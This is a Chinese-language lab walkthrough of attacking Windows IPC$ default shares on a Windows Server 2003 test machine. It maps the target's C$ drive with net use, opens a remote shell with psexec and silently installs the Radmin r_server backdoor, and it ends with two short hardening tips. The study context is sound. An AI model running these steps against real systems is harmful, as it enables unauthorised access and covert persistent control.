0x00 漏洞说明
IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行数据交换,从而实现对远程计算机的访问。IPC$是NT/2000及之后OS的一项新功能。一些别有用心者可以利用黑客工具软件对主机进行IPC$漏洞探测。如果用户设置的口令较弱而被破解,那么通过建立IPC$连接的以下命令,攻击者就可以轻易地进入到系统中进行任意操作。
0x01 工具准备
操作系统:
攻击机器 任意windows系统 本次实验中我所使用的是win10 专业版
目标靶机 windows xp 或者 windows server 2003 可以虚拟机,因为最近在玩webug,就直接使用windows server 2003了
实验工具 链接:http://pan.baidu.com/s/1nuFbekh 密码:lw0n
0x02 实验过程
步骤1
使用net share命令观察目标靶机IPC$漏洞是否存在
步骤2
首先ping一下目标靶机,观察网络连通性。
然后执行 net use \ip “密码” /user:”登陆账户”命令建立IPC$连接
使用 net use z: \ip\c$ 命令,将目标靶机的C盘映射到本地z盘
完成上述命令后将会在计算机看到网络位置出现了一个新的盘符,实际上目前就可以通过可视化桌面像在本地操作一样拷贝文件。
步骤2.5
如果你想酷一点的话,我们来试试copy指令。将要使用的远程控制软件拷贝到目标靶机的C盘中。执行过程如下:
步骤3
上述命令执行完毕后,我们使用psexec启动目标靶机上的一个shell。
将路径切换到psexec程序所在路径下 ,执行如下命令:
psexec.exe \ip –u 用户名 –p 密码 cmd.exe
步骤4
接下来我们来安装控制后门并启动运行。
使用如下指令实现r_server的静默安装:r_server /install /silence
执行两次net start r_server来启动后门服务,出现如下所示,即启动成功。
步骤5
接下来,我们使用radmin来连接目标靶机上运行的r_server
添加完成后,我们将可以像在本地一样操作目标靶机
0x03 防御
1 关闭IPC$默认共享
2 关闭IPC$默认共享的依赖服务server
控制面板/管理工具/服务 找到server 关闭